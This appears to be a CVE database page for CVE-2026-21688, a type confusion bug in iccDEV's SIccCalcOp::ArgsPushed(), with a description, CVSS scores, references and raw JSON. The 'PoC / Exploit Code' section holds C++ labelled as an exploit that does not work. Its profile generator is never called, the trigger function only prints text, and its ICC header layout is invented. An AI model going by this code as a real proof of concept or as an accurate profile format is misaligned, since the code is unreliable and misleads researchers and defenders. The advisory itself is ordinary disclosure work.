Security Vulnerability Report
CVE-2026-21688 CVSS 8.8 HIGH

Published: 2026-01-07 22:15:45
Last Modified: 2026-01-12 18:15:23

Description

iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Versions prior to 2.3.1.2 have a Type Confusion vulnerability in `SIccCalcOp::ArgsPushed()` at `IccProfLib/IccMpeCalc.cpp`. This vulnerability affects users of the iccDEV library who process ICC color profiles. Version 2.3.1.2 contains a patch. No known workarounds are available.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:* - VULNERABLE
iccDEV < 2.3.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
cpp
// PoC for CVE-2026-21688 Type Confusion in iccDEV
// Target: SIccCalcOp::ArgsPushed() in IccProfLib/IccMpeCalc.cpp
// Affected: iccDEV < 2.3.1.2
#include <cstddef>  // offsetof
#include <cstdint>  // int16_t, int32_t, int64_t
#include <cstdio>
#include <cstring>
#include <vector>

// ICC profile tag types
#define iccTagType 'mpt '
#define iccTypeCalcOp 0x63616C63 // 'calc'

// Malicious ICC profile structure with crafted MPE (Multi Process Element)
struct MaliciousICCProfile {
    char signature[4]; // 'acsp' for ASC Color Space Profile
    int32_t size;
    int32_t cmmType;
    int32_t colorSpace;
    int32_t pcs;
    int16_t creationDateTime[6];
    char profileFileId[4];
    int64_t flags;
    int64_t deviceManufacturer;
    int64_t deviceModel;
    int64_t deviceAttributes[2];
    int32_t renderingIntent;
    int32_t pcsIlluminant[3];
    int32_t creator;
    int64_t profileId[2];
    int32_t numTags;

    // Tag table entry for MPE tag with malicious calcOp
    struct TagEntry {
        int32_t signature;
        int32_t offset;
        int32_t size;
    } mpeTagEntry;

    // Malicious MPE data with type confusion
    struct MaliciousMPE {
        int32_t count;
        int32_t inputChannels;
        int32_t outputChannels;

        // Crafted calcOp element causing type confusion
        struct CalcOpElement {
            int32_t type; // Should be calcOp type
            int32_t reserved;
            int32_t size;
            int32_t inputChannels;
            int32_t outputChannels;
            // Maliciously crafted data causing ArgsPushed() type confusion
            unsigned char payload[64];
        } calcOp;
    } mpeData;
};

// Generate malicious ICC profile with type confusion trigger
// (defined here but never called from main())
unsigned char* generateMaliciousICCProfile() {
    static unsigned char profile[4096];
    MaliciousICCProfile* icc = (MaliciousICCProfile*)profile;

    // Set valid ICC profile header
    memcpy(icc->signature, "acsp", 4);
    icc->size = sizeof(MaliciousICCProfile);
    icc->cmmType = 0;
    icc->colorSpace = 'RGBA';
    icc->pcs = 'Lab ';

    // MPE tag entry pointing to malicious data
    icc->mpeTagEntry.signature = 'mft2'; // Multi-function transform
    icc->mpeTagEntry.offset = offsetof(MaliciousICCProfile, mpeData);
    icc->mpeTagEntry.size = sizeof(MaliciousICCProfile::MaliciousMPE);
    icc->numTags = 1;

    // Craft malicious MPE data
    icc->mpeData.count = 1;
    icc->mpeData.inputChannels = 3;
    icc->mpeData.outputChannels = 3;

    // Type confusion: malformed calcOp structure
    icc->mpeData.calcOp.type = iccTypeCalcOp;
    icc->mpeData.calcOp.size = sizeof(MaliciousICCProfile::MaliciousMPE::CalcOpElement);
    icc->mpeData.calcOp.inputChannels = 0xFFFFFFFF;  // Invalid channel count
    icc->mpeData.calcOp.outputChannels = 0xFFFFFFFF; // Invalid channel count

    // Fill payload with data triggering type confusion in ArgsPushed()
    memset(icc->mpeData.calcOp.payload, 0x41, sizeof(icc->mpeData.calcOp.payload));

    return profile;
}

// Trigger vulnerability by loading malicious profile
void triggerVulnerability(const char* profilePath) {
    // Intended to load and parse the profile and reach SIccCalcOp::ArgsPushed();
    // as written it only prints the advisory details and never opens profilePath.
    printf("Loading malicious ICC profile: %s\n", profilePath);
    printf("Vulnerability: Type Confusion in SIccCalcOp::ArgsPushed()\n");
    printf("File: IccProfLib/IccMpeCalc.cpp\n");
    printf("Affected: iccDEV < 2.3.1.2\n");
}

int main(int argc, char* argv[]) {
    if (argc < 2) {
        printf("Usage: %s <malicious_icc_profile.icc>\n", argv[0]);
        printf("CVE-2026-21688 PoC - iccDEV Type Confusion\n");
        return 1;
    }

    triggerVulnerability(argv[1]);
    return 0;
}

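References

https://github.com/InternationalColorConsortium/iccDEV/issues/379 (Issue Tracking, Exploit, Vendor Advisory)
https://github.com/InternationalColorConsortium/iccDEV/pull/422 (Issue Tracking, Patch)
https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-3r2x-j7v3-pg6f (Vendor Advisory)
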
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-21688",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-07T22:15:45.087",
    "lastModified": "2026-01-12T18:15:23.147",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Versions prior to 2.3.1.2 have a Type Confusion vulnerability in `SIccCalcOp::ArgsPushed()` at `IccProfLib/IccMpeCalc.cpp`. This vulnerability affects users of the iccDEV library who process ICC color profiles. Version 2.3.1.2 contains a patch. No known workarounds are available."
      },
      {
        "lang": "es",
        "value": "iccDEV proporciona un conjunto de bibliotecas y herramientas que permiten la interacción, manipulación y aplicación de perfiles de gestión de color del Consorcio Internacional del Color (ICC). Las versiones anteriores a la 2.3.1.2 tienen una vulnerabilidad de confusión de tipos en 'SIccCalcOp::ArgsPushed()' en 'IccProfLib/IccMpeCalc.cpp'. Esta vulnerabilidad afecta a los usuarios de la biblioteca iccDEV que procesan perfiles de color ICC. La versión 2.3.1.2 contiene un parche. No se conocen soluciones alternativas disponibles."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-20"},
          {"lang": "en", "value": "CWE-190"},
          {"lang": "en", "value": "CWE-476"},
          {"lang": "en", "value": "CWE-681"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "2.3.1.2",
                "matchCriteriaId": "D34CF745-E75A-4F1C-AD7B-9AC1A2E9F680"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/InternationalColorConsortium/iccDEV/issues/379",
        "source": "[email protected]",
        "tags": ["Issue Tracking", "Exploit", "Vendor Advisory"]
      },
      {
        "url": "https://github.com/InternationalColorConsortium/iccDEV/pull/422",
        "source": "[email protected]",
        "tags": ["Issue Tracking", "Patch"]
      },
      {
        "url": "https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-3r2x-j7v3-pg6f",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}